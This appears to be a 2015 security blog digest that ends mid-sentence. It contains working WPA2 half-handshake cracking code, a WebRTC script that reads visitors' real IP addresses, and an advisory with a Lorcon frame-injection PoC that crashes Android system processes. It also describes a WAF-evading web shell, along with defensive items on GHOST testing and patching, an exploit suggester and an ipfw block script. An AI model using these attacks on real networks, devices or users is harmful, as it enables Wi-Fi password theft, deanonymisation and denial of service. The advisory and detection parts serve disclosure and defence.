Jan 29, 2015

Tools: WPA2 HalfHandshake Crack

Conventional WPA2-PSK attacks work by capturing the four-way handshake between a client and its access point and running a dictionary attack against it. This tool is a proof of concept showing that the real access point does not need to be present. A client that has joined a network before sends probe requests for that SSID; an attacker who hears one can bring up an access point with the same SSID. Authentication fails, but the client still sends message 2 of the handshake, and the attacker chose message 1 (the ANonce), so the failed exchange contains enough material for an offline dictionary attack.

$ python halfHandshake.py -r sampleHalfHandshake.cap -m 48d224f0d128 -s "no place like"

where -r is the capture containing the half handshake, -m the MAC address of the client that responded, and -s the SSID the rogue access point advertised.
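Why a half handshake is enough, as an added example (my code, not the tool's): the client's message 2 carries a MIC keyed with the KCK, the first 16 bytes of the PTK, and the PTK depends only on the PMK, both MAC addresses and both nonces. The attacker picked the AP MAC and the ANonce and reads the SNonce and MIC from message 2, so every input except the passphrase is known. The SSID and client MAC are the ones from the command line above; the AP MAC, nonces, wordlist and the simulated client are assumptions made for the demo.

```python
import hashlib
import hmac
import struct

# Constructed parameters for the demo. The SSID and client MAC are the ones from
# the page's command line; the AP MAC is an assumption (the attacker picks it).
SSID = b"no place like"
AP_MAC = bytes.fromhex("aabbccddeeff")      # rogue AP, attacker-chosen
CLIENT_MAC = bytes.fromhex("48d224f0d128")  # client from the page's example

# EAPOL-Key layout (offsets into the frame built by eapol_msg2)
SNONCE_OFF, SNONCE_LEN = 17, 32
MIC_OFF, MIC_LEN = 81, 16


def pmk_from_passphrase(passphrase, ssid):
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def ptk_from_pmk(pmk, aa, spa, anonce, snonce):
    """IEEE 802.11 PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 20 bytes covers the 64 bytes needed
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_msg2(snonce, mic=bytes(MIC_LEN), replay_counter=1):
    """EAPOL-Key message 2 as the client sends it: RSN descriptor, key info 0x010a
    (descriptor version 2 = HMAC-SHA1-128 MIC, pairwise, MIC bit), no key data."""
    body = struct.pack(">BHHQ", 2, 0x010A, 0, replay_counter)
    body += snonce + bytes(16) + bytes(8) + bytes(8)    # SNonce, IV, RSC, ID
    body += mic + struct.pack(">H", 0)                  # MIC, key data length
    return struct.pack(">BBH", 1, 3, len(body)) + body  # EAPOL v1, type Key


def eapol_mic(pmk, aa, spa, anonce, snonce, frame):
    """MIC over the EAPOL frame with the MIC field zeroed, keyed with KCK = PTK[0:16]."""
    kck = ptk_from_pmk(pmk, aa, spa, anonce, snonce)[:16]
    zeroed = frame[:MIC_OFF] + bytes(MIC_LEN) + frame[MIC_OFF + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def client_message2(passphrase, anonce, snonce):
    """Simulated client: on receiving message 1 (ANonce) from the rogue AP it derives
    the PTK from its stored passphrase and answers with a MIC-protected message 2."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    mic = eapol_mic(pmk, AP_MAC, CLIENT_MAC, anonce, snonce, eapol_msg2(snonce))
    return eapol_msg2(snonce, mic=mic)


def crack_half_handshake(anonce, msg2, wordlist):
    """Attacker side: only the ANonce (which the attacker chose), message 2 and the
    two MAC addresses are needed. Returns the matching passphrase or None."""
    snonce = msg2[SNONCE_OFF:SNONCE_OFF + SNONCE_LEN]
    captured_mic = msg2[MIC_OFF:MIC_OFF + MIC_LEN]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, SSID)
        guess = eapol_mic(pmk, AP_MAC, CLIENT_MAC, anonce, snonce, msg2)
        if hmac.compare_digest(guess, captured_mic):
            return candidate
    return None


def demo(wordlist=(b"password", b"letmein1", b"correct horse")):
    anonce = bytes.fromhex("11" * 32)  # attacker-chosen; a real AP would pick it randomly
    snonce = bytes.fromhex("22" * 32)  # client's nonce, read from message 2 on a real capture
    msg2 = client_message2(b"correct horse", anonce, snonce)
    return crack_half_handshake(anonce, msg2, list(wordlist))


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The expensive step is the PBKDF2 per candidate, which is why the same PMK can be reused against any handshake for that SSID; the MIC check itself is cheap.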

Source:: http://n0where.net/wpa2-halfhandshake-crack/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Reveal the real IP of Firefox and Chrome users via WebRTC

Firefox and Chrome implement WebRTC, which lets a page make requests to STUN servers that return the user's local and public IP addresses. The results are exposed to JavaScript, so a page can read a visitor's local (LAN) and public IP addresses without any permission prompt. Because the browser sends the STUN traffic itself over UDP rather than through a proxy configured in the browser, the public address it reveals is that of the real uplink, which is why this defeats browser-level proxies. The demo below is an example implementation.
Additionally, these STUN requests are made outside the normal XMLHttpRequest path, so they do not appear in the developer console's network tab and cannot be blocked by request-filtering extensions such as AdBlock Plus or Ghostery. That makes them usable for tracking if an advertiser runs a STUN server on a wildcard domain. In Firefox, setting media.peerconnection.enabled to false in about:config disables WebRTC entirely and stops the leak; Chrome at the time had no equivalent setting.

//get the IP addresses associated with an account
function getIPs(callback){
    var ip_dups = {};

    //compatibility for firefox and chrome
    var RTCPeerConnection = window.RTCPeerConnection
        || window.mozRTCPeerConnection
        || window.webkitRTCPeerConnection;

    //minimal requirements for a data connection (no camera/mic prompt)
    var mediaConstraints = {
        optional: [{RtpDataChannels: true}]
    };

    //firefox already has a default stun server in about:config
    //    media.peerconnection.default_iceservers =
    //    [{"url": "stun:stun.services.mozilla.com"}]
    var servers = undefined;

    //add same stun server for chrome
    if(window.webkitRTCPeerConnection)
        servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};

    //construct a new RTCPeerConnection
    var pc = new RTCPeerConnection(servers, mediaConstraints);

    //listen for candidate events
    pc.onicecandidate = function(ice){

        //skip non-candidate events (the final event carries a null candidate)
        if(ice.candidate){

            //match just the IPv4 address in the candidate line;
            //IPv6 candidates do not match and are ignored
            var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
            var match = ip_regex.exec(ice.candidate.candidate);
            if(!match)
                return;
            var ip_addr = match[1];

            //remove duplicates: host, srflx and relay candidates repeat addresses
            if(ip_dups[ip_addr] === undefined)
                callback(ip_addr);

            ip_dups[ip_addr] = true;
        }
    };

    //create a bogus data channel so the offer contains a media section
    pc.createDataChannel("");

    //create an offer sdp
    pc.createOffer(function(result){

        //trigger the stun server request
        pc.setLocalDescription(result, function(){}, function(){});

    }, function(){});
}

//Test: Print the IP addresses into the console
getIPs(function(ip){console.log(ip);});

Source:: https://github.com/diafygi/webrtc-ips

Tools: Hipara - HIPS with Yara

Host intrusion prevention with the power of Yara

Source:: https://github.com/jbc22/hipara

Videos: Shmoocon 2015 Videos: Playlist Version (January 2015)

Link:: https://archive.org/details/shmoocon-2015-videos-playlist


Tools: Hopper - debug an application and a library at the same time

Hopper 3.7.3 is available. The most important feature of this release is the ability to debug multiple documents at once.
For instance, it is now possible to open one document with the main executable of an application and another with a framework used by the application. When you set breakpoints in both documents and launch the debugger, Hopper does its best to show the document that contains the current PC value.

Source:: http://hopperapp.com/blog/?p=136

Howto: Test for the GHOST vulnerability (CVE-2015-0235) and related resources

Check Vulnerability
1. Test with the code from the Qualys advisory (http://www.openwall.com/lists/oss-security/2015/01/27/9) or download it from http://webshare.uchicago.edu/orgs/ITServices/itsec/Downloads/GHOST.c

# wget "http://webshare.uchicago.edu/orgs/ITServices/itsec/Downloads/GHOST.c"

# gcc -o ghost GHOST.c
# ./ghost

###### Source code here
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

#define CANARY "in_the_coal_mine"

struct {
  char buffer[1024];
  char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };

int main(void) {
  struct hostent resbuf;
  struct hostent *result;
  int herrno;
  int retval;

  /*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/
  size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;
  char name[sizeof(temp.buffer)];
  memset(name, '0', len);
  name[len] = '\0';

  retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);

  if (strcmp(temp.canary, CANARY) != 0) {
    puts("vulnerable");
    exit(EXIT_SUCCESS);
  }
  if (retval == ERANGE) {
    puts("not vulnerable");
    exit(EXIT_SUCCESS);
  }
  puts("should not happen");
  exit(EXIT_SUCCESS);
}

###### End of Source code.
If it prints "vulnerable", the glibc this binary links against is affected by GHOST (CVE-2015-0235): gethostbyname_r() overwrote the canary placed right after the 1024-byte buffer. "not vulnerable" means the size check in __nss_hostname_digits_dots() is fixed and the call returned ERANGE. Run it against the glibc your services actually use; a statically linked or containerised service carries its own copy.

2. Check the glibc version
# ldd --version
The upstream fix landed in glibc 2.18 (May 2013), but distributions backport it, so the version alone is not conclusive. On Debian/Ubuntu compare `dpkg -l libc6` with the fixed packages from the distribution advisory: Debian 7 needs 2.13-38+deb7u7 or later (DSA-3142), Ubuntu 12.04 needs 2.15-0ubuntu10.10 or later (USN-2485); Ubuntu 14.04 ships 2.19 and was never affected.

On CentOS/Red Hat Enterprise Linux compare `rpm -q glibc` with the fixed packages from the Red Hat errata: glibc-2.12-1.149.el6_6.5 or later on EL6 and glibc-2.17-55.el7_0.5 or later on EL7 (RHSA-2015:0090), glibc-2.5-123.el5_11.1 or later on EL5 (RHSA-2015:0092).
3. Check with PHP
# php -r '$e="0";for($i=0;$i<2500;$i++){$e="0$e";} gethostbyname($e);'
A segmentation fault means PHP's gethostbyname() reached the vulnerable code path and the host is vulnerable; a patched glibc returns normally.

4. Find the processes that have glibc mapped
# lsof | grep libc | awk '{print $1}' | sort | uniq
Each of these keeps the old, vulnerable code in memory until it is restarted, even after the package has been updated.

How to fix
1. Debian/Ubuntu
Fix with
# apt-get update && apt-get upgrade && apt-get dist-upgrade

2. CentOS/Redhat Enterprise Linux
Fix with
# yum clean all && yum update

Then restart every process from step 4, or simply reboot. `lsof -n | grep libc | grep DEL` lists the processes that still map the deleted pre-update library.

-    http://www.frsag.org/pipermail/frsag/2015-January/005722.html
-    https://community.qualys.com/blogs/laws-of-vulnerabilities/2015/01/27/the-ghost-vulnerability
-    http://www.beej.us/guide/bgnet/output/html/multipage/gethostbynameman.html
-    http://man7.org/linux/man-pages/man3/gethostbyname.3.html
-    http://lcamtuf.blogspot.co.uk/2015/01/technical-analysis-of-qualys-ghost.html
-    http://www.openwall.com/lists/oss-security/2015/01/27/9
-    http://www.cyberciti.biz/faq/cve-2015-0235-patch-ghost-on-debian-ubuntu-fedora-centos-rhel-linux/

Jan 27, 2015

Android WiFi-Direct Denial of Service

1. *Advisory Information*

Title: Android WiFi-Direct Denial of Service
Advisory ID: CORE-2015-0002
Advisory URL:
Date published: 2015-01-26
Date of last update: 2015-01-26
Vendors contacted: Android Security Team
Release mode: User release

2. *Vulnerability Information*

Class: Uncaught Exception [CWE-248]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0997

3. *Vulnerability Description*

   Some Android devices are affected by a denial of service when scanning
   for WiFi Direct devices.

   An attacker within radio range can send a specially crafted 802.11 Probe
   Response frame that makes the Dalvik system process restart because of an
   unhandled exception raised while the WifiMonitor class processes the event.

4. *Vulnerable Packages*

   . Nexus 5 - Android 4.4.4
   . Nexus 4 - Android 4.4.4
   . LG D806 - Android 4.2.2
   . Samsung SM-T310 - Android 4.2.2
   . Motorola RAZR HD - Android 4.1.2

   Other devices could be also affected.

5. *Non-vulnerable packages*

   . Android 5.0.1
   . Android 5.0.2

6. *Vendor Information, Solutions and Workarounds*

   Possible mitigations are to avoid using WiFi-Direct or to update to a
   non-vulnerable Android version.
   Contact the vendor for further information.

7. *Credits*

   This vulnerability was discovered and researched by Andres Blanco from the
   CoreLabs Team. The publication of this advisory was coordinated by the Core

8. *Technical Description / Proof of Concept Code*

   Android makes use of a modified *wpa_supplicant*[1] in order to provide an
   interface between the wireless driver and the Android platform framework.

   Below is the JNI function that waits for *wpa_supplicant* events. It returns
   the raw event buffer as a jstring created with NewStringUTF.

    static jstring android_net_wifi_waitForEvent(JNIEnv* env, jobject)
    {
        char buf[EVENT_BUF_SIZE];
        int nread = ::wifi_wait_for_event(buf, sizeof buf);
        if (nread > 0) {
            return env->NewStringUTF(buf);
        } else {
            return NULL;
        }
    }

   The WiFi-Direct specification defines the P2P discovery procedure that lets
   P2P devices exchange device information; the device name is part of this
   information.

   The WifiP2pDevice class represents a Wi-Fi P2P device. Its constructor
   receives the event string provided by *wpa_supplicant* and throws an
   IllegalArgumentException if the event is malformed.

   Below is partial content of the WifiP2pDevice.java file.


        /** Detailed device string pattern with WFD info
         * Example:
         *  P2P-DEVICE-FOUND 00:18:6b:de:a3:6e
         *  pri_dev_type=1-0050F204-1 name='DWD-300-DEA36E'
         *  dev_capab=0x21 group_capab=0x9
         */
        private static final Pattern detailedDevicePattern = Pattern.compile(
            "((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
            "(\\d+ )?" +
            "p2p_dev_addr=((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
            "pri_dev_type=(\\d+-[0-9a-fA-F]+-\\d+) " +
            "name='(.*)' " +
            "config_methods=(0x[0-9a-fA-F]+) " +
            "dev_capab=(0x[0-9a-fA-F]+) " +
            "group_capab=(0x[0-9a-fA-F]+)" +
            "( wfd_dev_info=0x000006([0-9a-fA-F]{12}))?"
        );


        /**
         * @param string formats supported include
         *  P2P-DEVICE-FOUND fa:7b:7a:42:02:13
         *  pri_dev_type=1-0050F204-1 name='p2p-TEST1'
         *  config_methods=0x188 dev_capab=0x27
         *  group_capab=0x0 wfd_dev_info=000006015d022a0032
         *  P2P-DEVICE-LOST p2p_dev_addr=fa:7b:7a:42:02:13
         *  AP-STA-CONNECTED 42:fc:89:a8:96:09
         *  AP-STA-DISCONNECTED 42:fc:89:a8:96:09
         *  fa:7b:7a:42:02:13
         *  Note: The events formats can be looked up in the wpa_supplicant code
         * @hide
         */
        public WifiP2pDevice(String string) throws IllegalArgumentException {
            String[] tokens = string.split("[ \n]");
            Matcher match;

            if (tokens.length < 1) {
                throw new IllegalArgumentException("Malformed supplicant event");
            }

            switch (tokens.length) {
                case 1:
                    /* Just a device address */
                    deviceAddress = string;
                    return;
                case 2:
                    match = twoTokenPattern.matcher(string);
                    if (!match.find()) {
                        throw new IllegalArgumentException("Malformed supplicant event");
                    }
                    deviceAddress = match.group(2);
                    return;
                case 3:
                    match = threeTokenPattern.matcher(string);
                    if (!match.find()) {
                        throw new IllegalArgumentException("Malformed supplicant event");
                    }
                    deviceAddress = match.group(1);
                    return;
                default:
                    /* Four or more tokens: a detailed P2P-DEVICE-FOUND line. Any
                     * deviation from the pattern, e.g. in the name attribute, throws. */
                    match = detailedDevicePattern.matcher(string);
                    if (!match.find()) {
                        throw new IllegalArgumentException("Malformed supplicant event");
                    }

                    deviceAddress = match.group(3);
                    primaryDeviceType = match.group(4);
                    deviceName = match.group(5);
                    wpsConfigMethodsSupported = parseHex(match.group(6));
                    deviceCapability = parseHex(match.group(7));
                    groupCapability = parseHex(match.group(8));
                    if (match.group(9) != null) {
                        String str = match.group(10);
                        wfdInfo = new WifiP2pWfdInfo(parseHex(str.substring(0,4)),
                                parseHex(str.substring(4,8)),
                                parseHex(str.substring(8,12)));
                    }
                    break;
            }

            if (tokens[0].startsWith("P2P-DEVICE-FOUND")) {
                status = AVAILABLE;
            }
        }


   On some Android devices, processing a probe response frame whose P2P
   information element carries a device name attribute with specific bytes
   generates a malformed supplicant event string, which ends up throwing the
   IllegalArgumentException described above. As this exception is not handled,
   the Android system process restarts.

   Below is partial content of the logcat of a Samsung SM-T310 running Android 4.2.2.

      I/p2p_supplicant( 2832): P2P-DEVICE-FOUND 00.EF.00 p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5  'fa¬¬' config_methods=0x188 dev_capab=0x21 group_capab=0x0
      E/AndroidRuntime( 2129): ! () *** FATAL EXCEPTION IN SYSTEM PROCESS:
      E/AndroidRuntime( 2129): java.lang.IllegalArgumentException:
Malformed supplicant event
      E/AndroidRuntime( 2129):        at
      E/AndroidRuntime( 2129):        at
      E/AndroidRuntime( 2129):        at
      E/android.os.Debug( 2129): ! () Dumpstate > dumpstate -k -t -z -d -o
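   To see exactly why the logged event is rejected, here is an added example (my code, not the advisory's PoC or AOSP code): a Python port of detailedDevicePattern, the constructor's matching logic for the detailed case, and the tolerant dispatcher the monitor loop should have had. The event strings are constructed for the demo: the first follows the Javadoc format (with the 0x prefix the pattern actually expects on wfd_dev_info), the second is the line from the SM-T310 logcat above, the third is a variant where only the name= token is missing.

```python
import re

# Python port of the detailedDevicePattern quoted from WifiP2pDevice.java.
# Groups (1-based, as in the Java code): 1 device address, 2 optional digits,
# 3 p2p_dev_addr, 4 pri_dev_type, 5 name, 6 config_methods, 7 dev_capab,
# 8 group_capab, 9 optional wfd_dev_info token, 10 its 12 hex digits.
DETAILED_DEVICE_PATTERN = re.compile(
    r"((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) "
    r"(\d+ )?"
    r"p2p_dev_addr=((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) "
    r"pri_dev_type=(\d+-[0-9a-fA-F]+-\d+) "
    r"name='(.*)' "
    r"config_methods=(0x[0-9a-fA-F]+) "
    r"dev_capab=(0x[0-9a-fA-F]+) "
    r"group_capab=(0x[0-9a-fA-F]+)"
    r"( wfd_dev_info=0x000006([0-9a-fA-F]{12}))?"
)

# Constructed sample events (see the lead-in for their provenance).
GOOD_EVENT = (
    "P2P-DEVICE-FOUND fa:7b:7a:42:02:13 p2p_dev_addr=fa:7b:7a:42:02:13 "
    "pri_dev_type=1-0050F204-1 name='p2p-TEST1' config_methods=0x188 "
    "dev_capab=0x27 group_capab=0x0 wfd_dev_info=0x000006015d022a0032"
)
LOGCAT_EVENT = (
    "P2P-DEVICE-FOUND 00.EF.00 p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5 "
    " 'fa\u00ac\u00ac' config_methods=0x188 dev_capab=0x21 group_capab=0x0"
)
NO_NAME_EVENT = (
    "P2P-DEVICE-FOUND fa:7b:7a:42:02:13 p2p_dev_addr=fa:7b:7a:42:02:13 "
    "pri_dev_type=10-0050F204-5 'fafa' config_methods=0x188 "
    "dev_capab=0x21 group_capab=0x0"
)


class MalformedSupplicantEvent(ValueError):
    """Stands in for Java's IllegalArgumentException("Malformed supplicant event")."""


def parse_device_found(event):
    """The 'default' branch of WifiP2pDevice(String): a detailed event must
    satisfy detailedDevicePattern via find(), i.e. re.search(), or the
    constructor throws. Returns the fields the constructor would set."""
    tokens = re.split(r"[ \n]", event)
    m = DETAILED_DEVICE_PATTERN.search(event)
    if m is None:
        raise MalformedSupplicantEvent("Malformed supplicant event")
    return {
        "device_address": m.group(3),
        "primary_device_type": m.group(4),
        "device_name": m.group(5),
        "wps_config_methods": int(m.group(6), 16),
        "device_capability": int(m.group(7), 16),
        "group_capability": int(m.group(8), 16),
        "wfd_info": m.group(10),  # None when the optional token is absent
        "status": "AVAILABLE" if tokens[0].startswith("P2P-DEVICE-FOUND") else None,
    }


def handle_event(event):
    """What the monitor loop should do with supplicant output: treat it as
    untrusted input, catch the parse failure and drop the event instead of
    letting the exception escape the thread. On the affected builds nothing
    caught it, which is what takes the system process down."""
    try:
        return parse_device_found(event)
    except MalformedSupplicantEvent:
        return None


if __name__ == "__main__":
    for name, ev in ("good", GOOD_EVENT), ("logcat", LOGCAT_EVENT), ("no-name", NO_NAME_EVENT):
        print(name, "->", handle_event(ev))
```

   The logcat line fails for two independent reasons: the addresses are printed as 00.EF.00 rather than as six colon-separated hex octets, and the name= token is absent; the third event shows that the missing name alone is enough.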

8.1. *Proof of Concept*

   This PoC was implemented using the open source library Lorcon
   [2] and PyLorcon2 [3], a Python wrapper for the Lorcon library.

    #!/usr/bin/env python
    # Python 2 PoC: builds a WiFi-Direct probe response whose P2P Device Info
    # attribute carries the crafted device name and injects it with Lorcon.

    import sys
    import time
    import struct
    import PyLorcon2

    def get_probe_response(source, destination, channel):
        frame = str()
        frame += "\x50\x00"  # Frame Control: management, subtype 5 (probe response)
        frame += "\x00\x00"  # Duration
        frame += destination # Address 1: receiver (target station)
        frame += source      # Address 2: transmitter
        frame += source      # Address 3: BSSID
        frame += "\x00\x00"  # Sequence Control
        frame += "\x00\x00\x00\x00\x00\x00\x00\x00"  # Timestamp
        frame += "\x64\x00"  # Beacon Interval
        frame += "\x30\x04"  # Capabilities Information

        # SSID IE: WiFi-Direct devices advertise the "DIRECT-" prefix
        frame += "\x00"
        frame += "\x07"
        frame += "DIRECT-"

        # Supported Rates
        frame += "\x01"
        frame += "\x08"
        frame += "\x8C\x12\x98\x24\xB0\x48\x60\x6C"

        # DS Parameter Set
        frame += "\x03"
        frame += "\x01"
        frame += struct.pack("B", channel)

        # P2P vendor-specific IE (OUI 50-6F-9A, type 0x09), 0x27 = 39 payload bytes
        frame += "\xDD"
        frame += "\x27"
        frame += "\x50\x6F\x9A"
        frame += "\x09"
        # P2P Capability attribute
        frame += "\x02" # ID
        frame += "\x02\x00" # Length
        frame += "\x21\x00" # Device Capability 0x21, Group Capability 0x00
        # P2P Device Info attribute (0x1B = 27 bytes)
        frame += "\x0D" # ID
        frame += "\x1B\x00" # Length
        frame += source                              # P2P Device address
        frame += "\x01\x88"                          # Config Methods 0x0188
        frame += "\x00\x0A\x00\x50\xF2\x04\x00\x05"  # Primary Device Type 10-0050F204-5
        frame += "\x00"                              # Number of Secondary Device Types
        frame += "\x10\x11"                          # WPS attribute type: Device Name
        frame += "\x00\x06"                          # Device Name length
        frame += "fafa\xFA\xFA"                      # the bytes that produce the malformed event

        return frame

    def str_to_mac(address):
        return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))

    if __name__ == "__main__":
        if len(sys.argv) != 3:
            print "Usage:"
            print "  poc.py <iface> <target>"
            print "Example:"
            print "  poc.py wlan0 00:11:22:33:44:55"
            sys.exit(1)

        iface = sys.argv[1]
        destination = str_to_mac(sys.argv[2])

        # open the interface in injection/monitor mode and tune it to the channel
        context = PyLorcon2.Context(iface)
        context.open_injmon()

        channel = 1
        context.set_channel(channel)
        source = str_to_mac("00:11:22:33:44:55")
        frame = get_probe_response(source, destination, channel)

        print "Injecting PoC."
        for i in range(100):
            context.send_bytes(frame)
            time.sleep(0.1)
Source:: http://seclists.org/fulldisclosure/2015/Jan/104 

Jan 26, 2015

Tools: sshttp - hiding SSH servers behind HTTP

If your firewall policy forbids SSH access to the DMZ or internal network from outside, but you still want to use SSH on machines that have only one open port (e.g. HTTP), you can use sshttpd.
sshttpd can multiplex the following protocol pairs:
  • SSH/SMTP (without SMTP multiline banners)
Source:: https://github.com/stealth/sshttp

Tools: DAws - Advanced Web Shell

The project's README lists what it claims sets DAws apart from other web shells:
  1. Bypasses disablers: rather than relying on a single function, DAws tries up to six. If shell_exec is disabled it falls back to exec, passthru, system, popen or proc_open; likewise, if cURL is disabled, downloading a file from a URL falls back to file_get_contents. This fallback logic is used throughout the shell.
  2. Automatic random encoding: most GET and POST data is randomly encoded on the fly, in JavaScript or PHP, which the authors say lets the shell evade most signature-based WAF rules.
  3. Advanced file manager: everything is generated dynamically; the permissions of every file and folder are checked and only the operations those permissions allow are offered, which saves time.
  4. Tools: DAws bundles utilities such as "bpscan", which identifies usable, unblocked ports on the server within a few minutes, for example to pick a port for a bind shell.
  5. Anything that cannot be used is removed so users do not waste time on it: for example, executing C++ source when no C++ compiler is present (DAws checks for several compilers first) is dropped from the interface and the user is told why.
  6. Supports Windows and Linux.
  7. Open source.
Source:: https://github.com/dotcppfile/DAws

Tools: malwaRE - Malware repository framework

Malware comes with many different behaviours, and many security research teams run distributed honeypots to catch new samples: the honeypots emulate vulnerable services that attract malware and collect the binaries it drops. If you work in malware research, take a look at the malwaRE project.
malwaRE is a malware repository that helps researchers store samples for later analysis and keep track of old samples they may need again. Some of the features:
  • Self-hosted solution (PHP/Mysql server needed)
  • VirusTotal results (option for uploading unknown samples)
  • Search filters available (vendor, filename, hash, tag)
  • Vendor name is picked from VirusTotal results in that order: Microsoft, Kaspersky, Bitdefender
  • Add writeup url(s) for each sample
  • Manage samples by tag
  • Tag autocomplete
  • VirusTotal rescan button (VirusTotal’s score column)
  • Download samples from repository
Source:: http://www.sectechno.com/malware-malware-repository-framework/

Windows Exploit Suggester

This tool compares a target's patch level against the Microsoft vulnerability database to detect potentially missing patches on the target. It also tells you whether public exploits or Metasploit modules exist for the missing bulletins.

It needs the output of the `systeminfo` command from the Windows host; it compares the hotfix list in that output against the Microsoft security bulletin database to determine the host's patch level.
With the `--update` flag it downloads the security bulletin database from Microsoft and saves it as an Excel spreadsheet.
When reading the output, note that the tool starts by assuming every bulletin for the detected OS applies and then removes bulletins only when the corresponding hotfix is listed. This produces many false positives, so you must know what software actually runs on the target: for example, it will flag IIS bulletins even if IIS is not running on the host.
In the output, (E) marks a bulletin with a public exploit and (M) one with a Metasploit module.
It was heavily inspired by Linux_Exploit_Suggester by Pentura.
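The matching logic described above, as an added example (my code, not the tool's): parse the hotfix list out of systeminfo output, start from every bulletin for that OS and drop the ones whose KB is installed, then mark what is left. The bulletin table is a constructed stand-in for the spreadsheet the tool downloads (the bulletin/KB pairs and titles are real Microsoft bulletins, the single product column and the exploit/Metasploit flags are illustrative), and the systeminfo text is constructed too. The MS15-034 row shows the false-positive problem: it survives the filter whether or not IIS is installed, so every finding carries its component for the analyst to verify.

```python
import re

# Constructed stand-in for the bulletin spreadsheet the tool fetches with --update.
# Bulletin/KB pairs and titles are real Microsoft bulletins; the product column is
# reduced to a single OS string and the exploit/Metasploit flags are illustrative.
BULLETINS = [
    {"id": "MS10-015", "kb": "977165", "product": "Windows 7", "component": "Windows kernel",
     "title": "Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege",
     "exploit": True, "msf": True},
    {"id": "MS13-053", "kb": "2850851", "product": "Windows 7", "component": "win32k.sys",
     "title": "Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution",
     "exploit": True, "msf": True},
    {"id": "MS14-058", "kb": "3000061", "product": "Windows 7", "component": "win32k.sys",
     "title": "Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution",
     "exploit": True, "msf": True},
    {"id": "MS15-034", "kb": "3042553", "product": "Windows 7", "component": "HTTP.sys (IIS)",
     "title": "Vulnerability in HTTP.sys Could Allow Remote Code Execution",
     "exploit": True, "msf": False},
    {"id": "MS14-058", "kb": "3000061", "product": "Windows 8.1", "component": "win32k.sys",
     "title": "Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution",
     "exploit": True, "msf": True},
]

# Constructed systeminfo output (only the fields this example reads).
SAMPLE_SYSTEMINFO = """\
Host Name:                 WIN7-LAB
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2479943
                           [02]: KB3000061
"""


def parse_systeminfo(text):
    """Return (OS Name, set of installed KB numbers without the 'KB' prefix)."""
    os_name, kbs = None, set()
    for line in text.splitlines():
        if line.startswith("OS Name:"):
            os_name = line.split(":", 1)[1].strip()
        kbs.update(re.findall(r"\bKB(\d+)\b", line))
    return os_name, kbs


def os_family(os_name):
    """Reduce 'Microsoft Windows 7 Professional' to the product key used in BULLETINS."""
    m = re.search(r"Windows (Server \d{4}(?: R2)?|\d+(?:\.\d)?|XP|Vista)", os_name or "")
    return "Windows " + m.group(1) if m else None


def suggest(os_name, installed_kbs, bulletins=BULLETINS):
    """Assume every bulletin for this OS is missing, then remove the ones whose
    hotfix is installed. Nothing here knows whether the affected component is
    actually present, which is where the false positives come from."""
    family = os_family(os_name)
    findings = []
    for b in bulletins:
        if b["product"] != family or b["kb"] in installed_kbs:
            continue
        marker = ("E" if b["exploit"] else "") + ("M" if b["msf"] else "") or "*"
        findings.append(dict(b, marker=marker))
    return findings


def format_finding(f):
    return "[%s] %s: %s (KB%s) - verify %s is present" % (
        f["marker"], f["id"], f["title"], f["kb"], f["component"])


if __name__ == "__main__":
    name, kbs = parse_systeminfo(SAMPLE_SYSTEMINFO)
    for f in suggest(name, kbs):
        print(format_finding(f))
```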

Howto: Block requests from China with ipfw


#!/bin/sh
# cn.zone comes from http://www.ipdeny.com/ipblocks/
# build the rules with:
# $ build_rules > /tmp/china_rules
# apply rules with:
# $ sudo ipfw /tmp/china_rules

# first rule number (assumed; the original value is not shown): pick a range
# that does not collide with your existing rules
r=10000
while read line; do
    echo "add $r deny ip from $line to any in"
    r=$(( r + 1 ))
done < cn.zone

This produces one numbered rule per prefix (several thousand for cn.zone), and ipfw evaluates them linearly. On ipfw versions with table support, loading the prefixes into a table and adding a single "deny ip from table(1) to any in" rule is far cheaper. Country blocking is also coarse: it drops legitimate visitors, and an attacker can simply relay through another country.

Howto: Apache - deny requests whose Host header matches no ServerName

Apache Configuration

My first thought was to deal with the traffic by handling the HTTP traffic more efficiently.
We host several sites on our server and use VirtualHost to route traffic on a single IP address to multiple websites. Virtual hosts rely on the "Host:" header in the HTTP request to determine where the traffic should go, and as we've seen above, the host information was totally bogus.
One thing I learned is that Apache can have problems figuring out which virtual host to use in some cases:
